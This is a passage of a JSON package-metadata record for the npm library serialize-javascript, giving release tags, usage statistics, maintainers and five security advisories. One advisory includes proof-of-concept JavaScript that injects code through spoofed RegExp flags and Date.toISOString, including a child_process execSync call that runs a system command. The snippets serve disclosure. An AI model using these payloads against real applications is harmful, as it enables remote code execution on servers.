cosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"587bae62e2053cc13e2f4c6524a3cc0c9f211905","kind":"tag","published_at":"2015-08-27T20:24:42.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.1.1","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"826a981a0783b2f69ed02c4ab5217015872344da","kind":"tag","published_at":"2015-08-26T20:21:35.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.1.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.1.0/manifests"},{"name":"v1.0.0","sha":"bc8e8115e840c2c67c406eceb3499d537103ead6","kind":"commit","published_at":"2014-09-16T17:30:53.000Z","download_url":"https://codeload.github.com/yahoo/serialize-javascript/tar.gz/v1.0.0","html_url":"https://github.com/yahoo/serialize-javascript/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/yahoo/serialize-javascript@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/tags/v1.0.0/manifests"}]},"repo_metadata_updated_at":"2026-04-10T15:13:39.499Z","dependent_packages_count":2603,"downloads":219831407,"downloads_period":"last-month","dependent_repos_count":1239571,"rankings":{"downloads":0.0076389717889212465,"dependent_repos_count":0.028009563226044566,"dependent_packages_count":0.030911824909290633,"stargazers_count":1.6429269809926448,"forks_count":2.162513511944723,"docker_downloads_count":0.009117482457744713,"average":0.6468530558865615},"purl":"pkg:npm/serialize-javascript","advisories":[{"uuid":"GSA_kwCzR0hTQS1xajh3LWdmajUtOGM2ds4ABUYo","url":"https://github.com/advisories/GHSA-qj8w-gfj5-8c6v","title":"Serialize JavaScript has CPU Exhaustion Denial of Service via crafted array-like objects","description":"### Impact\n\n**What kind of vulnerability is it?**\n\nIt is a **Denial of Service (DoS)** vulnerability caused by CPU exhaustion. When serializing a specially crafted \"array-like\" object (an object that inherits from `Array.prototype` but has a very large `length` property), the process enters an intensive loop that consumes 100% CPU and hangs indefinitely.\n\n**Who is impacted?**\n\nApplications that use `serialize-javascript` to serialize untrusted or user-controlled objects are at risk. While direct exploitation is difficult, it becomes a high-priority threat if the application is also vulnerable to **Prototype Pollution** or handles untrusted data via **YAML Deserialization**, as these could be used to inject the malicious object.\n\n### Patches\n\n**Has the problem been patched?**\n\nYes, the issue has been patched by replacing `instanceof Array` checks with `Array.isArray()` and using `Object.keys()` for sparse array detection.\n\n**What versions should users upgrade to?**\n\nUsers should upgrade to **`v7.0.5`** or later.\n\n### Workarounds\n\n**Is there a way for users to fix or remediate the vulnerability without upgrading?**\n\nThere is no direct code-level workaround within the library itself. However, users can mitigate the risk by:\n\n* Validating and sanitizing all input before passing it to the `serialize()` function.\n* Ensuring the environment is protected against Prototype Pollution.\n* Upgrading to **`v7.0.5`** as soon as possible.\n\n### Acknowledgements\n\nSerialize JavaScript thanks **Tomer Aberbach** (@TomerAberbach) for discovering and privately disclosing this issue.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-03-27T18:18:54.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.9,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","references":["https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-qj8w-gfj5-8c6v","https://github.com/yahoo/serialize-javascript/commit/f147e90269b58bb6e539cfdf3d0e20d6ad14204b","https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.5","https://nvd.nist.gov/vuln/detail/CVE-2026-34043","https://github.com/advisories/GHSA-qj8w-gfj5-8c6v"],"source_kind":"github","identifiers":["GHSA-qj8w-gfj5-8c6v","CVE-2026-34043"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-03-27T19:00:08.582Z","updated_at":"2026-04-10T16:00:30.844Z","epss_percentage":0.00052,"epss_percentile":0.16318,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xajh3LWdmajUtOGM2ds4ABUYo","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1xajh3LWdmajUtOGM2ds4ABUYo","packages":[{"ecosystem":"npm","package_name":"serialize-javascript","versions":[{"first_patched_version":"7.0.5","vulnerable_version_range":"\u003c 7.0.5"}],"purl":"pkg:npm/serialize-javascript"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xajh3LWdmajUtOGM2ds4ABUYo/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS01YzZqLXI0OHgtcm12cc4ABS7G","url":"https://github.com/advisories/GHSA-5c6j-r48x-rmvq","title":"Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()","description":"### Impact\n\nThe serialize-javascript npm package (versions \u003c= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.\n\nWhile `RegExp.source` is sanitized, `RegExp.flags` is interpolated directly into the generated output without escaping. A similar issue exists in `Date.prototype.toISOString()`.\n\nIf an attacker can control the input object passed to `serialize()`, they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via `eval`, `new Function`, or `\u003cscript\u003e` tags), the injected code executes.\n\n```javascript\nconst serialize = require('serialize-javascript');\n// Create an object that passes instanceof RegExp with a spoofed .flags\nconst fakeRegex = Object.create(RegExp.prototype);\nObject.defineProperty(fakeRegex, 'source', { get: () =\u003e 'x' });\nObject.defineProperty(fakeRegex, 'flags', {\n  get: () =\u003e '\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"'\n});\nfakeRegex.toJSON = function() { return '@placeholder'; };\nconst output = serialize({ re: fakeRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"\")}\nlet obj;\neval('obj = ' + output);\nconsole.log(global.PWNED); // \"CODE_INJECTION_VIA_FLAGS\" — injected code executed!\n#h2. PoC 2: Code Injection via Date.toISOString()\n```\n\n```javascript\nconst serialize = require('serialize-javascript');\nconst fakeDate = Object.create(Date.prototype);\nfakeDate.toISOString = function() { return '\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"'; };\nfakeDate.toJSON = function() { return '2024-01-01'; };\nconst output = serialize({ d: fakeDate });\n// Output: {\"d\":new Date(\"\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"\")}\neval('obj = ' + output);\nconsole.log(global.DATE_PWNED); // \"DATE_INJECTION\" — injected code executed!\n#h2. PoC 3: Remote Code Execution\n```\n\n```javascript\nconst serialize = require('serialize-javascript');\nconst rceRegex = Object.create(RegExp.prototype);\nObject.defineProperty(rceRegex, 'source', { get: () =\u003e 'x' });\nObject.defineProperty(rceRegex, 'flags', {\n  get: () =\u003e '\"+require(\"child_process\").execSync(\"id\").toString()+\"'\n});\nrceRegex.toJSON = function() { return '@rce'; };\nconst output = serialize({ re: rceRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+require(\"child_process\").execSync(\"id\").toString()+\"\")}\n// When eval'd on a Node.js server, executes the \"id\" system command\n```\n\n### Patches\n\nThe fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-02-28T02:50:45.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-5c6j-r48x-rmvq","https://nvd.nist.gov/vuln/detail/CVE-2020-7660","https://github.com/yahoo/serialize-javascript/commit/2e609d0a9f4f5b097f0945af88bd45b9c7fb48d9","https://github.com/advisories/GHSA-hxcc-f52p-wc94","https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3","https://github.com/advisories/GHSA-5c6j-r48x-rmvq"],"source_kind":"github","identifiers":["GHSA-5c6j-r48x-rmvq"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-02-28T03:00:07.214Z","updated_at":"2026-04-05T20:00:56.707Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01YzZqLXI0OHgtcm12cc4ABS7G","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS01YzZqLXI0OHgtcm12cc4ABS7G","packages":[{"ecosystem":"npm","package_name":"serialize-javascript","versions":[{"first_patched_version":"7.0.3","vulnerable_version_range":"\u003c= 7.0.2"}],"purl":"pkg:npm/serialize-javascript"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS01YzZqLXI0OHgtcm12cc4ABS7G/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03NnA3LTc3M2YtcjRxNc4ABEQm","url":"https://github.com/advisories/GHSA-76p7-773f-r4q5","title":"Cross-site Scripting (XSS) in serialize-javascript","description":"A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-02-10T18:30:47.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","references":["https://nvd.nist.gov/vuln/detail/CVE-2024-11831","https://github.com/yahoo/serialize-javascript/pull/173","https://github.com/yahoo/serialize-javascript/commit/f27d65d3de42affe2aac14607066c293891cec4e","https://access.redhat.com/security/cve/CVE-2024-11831","https://bugzilla.redhat.com/show_bug.cgi?id=2312579","https://access.redhat.com/errata/RHSA-2025:1334","https://access.redhat.com/errata/RHSA-2025:1468","https://github.com/yahoo/serialize-javascript/commit/7f3ac252d86b802454cb43782820aea2e0f6dc25","https://access.redhat.com/errata/RHBA-2025:0304","https://access.redhat.com/errata/RHSA-2025:4511","https://access.redhat.com/errata/RHSA-2025:8059","https://access.redhat.com/errata/RHSA-2025:8479","https://access.redhat.com/errata/RHSA-2025:8544","https://access.redhat.com/errata/RHSA-2025:8551","https://access.redhat.com/errata/RHSA-2025:21068","https://access.redhat.com/errata/RHSA-2025:21203","https://access.redhat.com/errata/RHSA-2025:9294","https://access.redhat.com/errata/RHSA-2025:8078","https://access.redhat.com/errata/RHSA-2025:10853","https://access.redhat.com/errata/RHSA-2025:8512","https://access.redhat.com/errata/RHSA-2025:8233","https://access.redhat.com/errata/RHSA-2025:3870","https://access.redhat.com/errata/RHSA-2025:0381","https://access.redhat.com/errata/RHSA-2026:1536","https://access.redhat.com/errata/RHSA-2026:2769","https://github.com/advisories/GHSA-76p7-773f-r4q5"],"source_kind":"github","identifiers":["GHSA-76p7-773f-r4q5","CVE-2024-11831"],"repository_url":"https://github.com/yahoo/serialize-javascript","blast_radius":0.0,"created_at":"2025-02-10T22:07:13.625Z","updated_at":"2026-04-10T16:03:28.146Z","epss_percentage":0.01098,"epss_percentile":0.78015,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03NnA3LTc3M2YtcjRxNc4ABEQm","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03NnA3LTc3M2YtcjRxNc4ABEQm","packages":[{"ecosystem":"npm","package_name":"serialize-javascript","versions":[{"first_patched_version":"6.0.2","vulnerable_version_range":"\u003e= 6.0.0, \u003c 6.0.2"}],"purl":"pkg:npm/serialize-javascript"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03NnA3LTc3M2YtcjRxNc4ABEQm/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWh4Y2MtZjUycC13Yzk0","url":"https://github.com/advisories/GHSA-hxcc-f52p-wc94","title":"Insecure serialization leading to RCE in serialize-javascript","description":"serialize-javascript prior to 3.1.0 allows remote attackers to inject arbitrary code via the function \"deleteFunctions\" within \"index.js\". \n\nAn object such as `{\"foo\": /1\"/, \"bar\": \"a\\\"@__R-\u003cUID\u003e-0__@\"}` was serialized as `{\"foo\": /1\"/, \"bar\": \"a\\/1\"/}`, which allows an attacker to escape the `bar` key. This requires the attacker to control the values of both `foo` and `bar` and guess the value of `\u003cUID\u003e`. The UID has a keyspace of approximately 4 billion making it a realistic network attack.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2020-08-11T17:21:13.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.1,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","references":["https://nvd.nist.gov/vuln/detail/CVE-2020-7660","https://github.com/yahoo/serialize-javascript/commit/f21a6fb3ace2353413761e79717b2d210ba6ccbd","https://github.com/advisories/GHSA-hxcc-f52p-wc94"],"source_kind":"github","identifiers":["GHSA-hxcc-f52p-wc94","CVE-2020-7660"],"repository_url":"https://github.com/yahoo/serialize-javascript","blast_radius":0.0,"created_at":"2022-12-21T16:13:22.945Z","updated_at":"2026-04-05T20:07:06.090Z","epss_percentage":0.02901,"epss_percentile":0.86051,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWh4Y2MtZjUycC13Yzk0","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWh4Y2MtZjUycC13Yzk0","packages":[{"ecosystem":"npm","package_name":"serialize-javascript","versions":[{"first_patched_version":"3.1.0","vulnerable_version_range":"\u003c 3.1.0"}],"purl":"pkg:npm/serialize-javascript"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWh4Y2MtZjUycC13Yzk0/related_packages","related_advisories":[]},{"uuid":"MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWg5cnYtam1tZi00cGd4","url":"https://github.com/advisories/GHSA-h9rv-jmmf-4pgx","title":"Cross-Site Scripting in serialize-javascript","description":"Versions of `serialize-javascript` prior to 2.1.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize serialized regular expressions. This vulnerability does not affect Node.js applications.\n\n\n## Recommendation\n\nUpgrade to version 2.1.1 or later.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2019-12-05T18:44:37.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.2,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L","references":["https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-h9rv-jmmf-4pgx","https://nvd.nist.gov/vuln/detail/CVE-2019-16769","https://github.com/advisories/GHSA-h9rv-jmmf-4pgx","https://www.npmjs.com/advisories/1426"],"source_kind":"github","identifiers":["GHSA-h9rv-jmmf-4pgx","CVE-2019-16769"],"repository_url":"https://github.com/yahoo/serialize-javascript","blast_radius":0.0,"created_at":"2022-12-21T16:13:26.957Z","updated_at":"2026-04-13T12:11:46.928Z","epss_percentage":0.00406,"epss_percentile":0.60582,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWg5cnYtam1tZi00cGd4","html_url":"https://advisories.ecosyste.ms/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWg5cnYtam1tZi00cGd4","packages":[{"ecosystem":"npm","package_name":"serialize-javascript","versions":[{"first_patched_version":"2.1.1","vulnerable_version_range":"\u003c 2.1.1"}],"purl":"pkg:npm/serialize-javascript"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWg5cnYtam1tZi00cGd4/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/serialize-javascript","docker_dependents_count":28296,"docker_downloads_count":8869719631,"usage_url":"https://repos.ecosyste.ms/usage/npm/serialize-javascript","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/serialize-javascript/dependencies","status":null,"funding_links":[],"critical":true,"issue_metadata":{"last_synced_at":"2026-04-10T06:01:04.524Z","issues_count":32,"pull_requests_count":139,"avg_time_to_close_issue":10114840.384615384,"avg_time_to_close_pull_request":7788997.183333334,"issues_closed_count":13,"pull_requests_closed_count":120,"pull_request_authors_count":30,"issue_authors_count":32,"avg_comments_per_issue":2.65625,"avg_comments_per_pull_request":0.8633093525179856,"merged_pull_requests_count":93,"bot_issues_count":0,"bot_pull_requests_count":88,"past_year_issues_count":4,"past_year_pull_requests_count":14,"past_year_avg_time_to_close_issue":68756.0,"past_year_avg_time_to_close_pull_request":285818.71428571426,"past_year_issues_closed_count":1,"past_year_pull_requests_closed_count":7,"past_year_pull_request_authors_count":7,"past_year_issue_authors_count":4,"past_year_avg_comments_per_issue":4.75,"past_year_avg_comments_per_pull_request":1.9285714285714286,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":7,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/yahoo%2Fserialize-javascript/issues","maintainers":[{"login":"okuryu","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/okuryu"},{"login":"redonkulus","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/redonkulus"}],"active_maintainers":[{"login":"okuryu","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/okuryu"},{"login":"redonkulus","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/redonkulus"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/serialize-javascript/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/serialize-javascript/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/serialize-javascript/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/serialize-javascript/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/serialize-javascript/codemeta","maintainers":[{"uuid":"redonkulus","login":"redonkulus","name":null,"email":"seth@bertalotto.net","url":null,"packages_count":92,"html_url":"https://www.npmjs.com/~redonkulus","role":null,"created_at":"2022-11-10T11:55:43.633Z","updated_at":"2022-11-10T11:55:43.633Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/redonkulus/packages"},{"uuid":"okuryu","login":"okuryu","name":null,"email":"okuryu@okuryu.com","url":null,"packages_count":19,"html_url":"https://www.npmjs.com/~okuryu","role":null,"created_at":"2022-11-10T11:55:43.521Z","updated_at":"2022-11-10T11:55:43.521Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/okuryu/packages"},{"uuid":"ericf","login":"ericf","name":null,"email":"eferraiuolo@gmail.com","url":null,"packages_count":39,"html_url":"https://www.npmjs.com/~ericf","role":null,"created_at":"2022-11-10T11:55:43.599Z","updated_at":"2022-11-10T11:55:43.599Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ericf/packages"}]}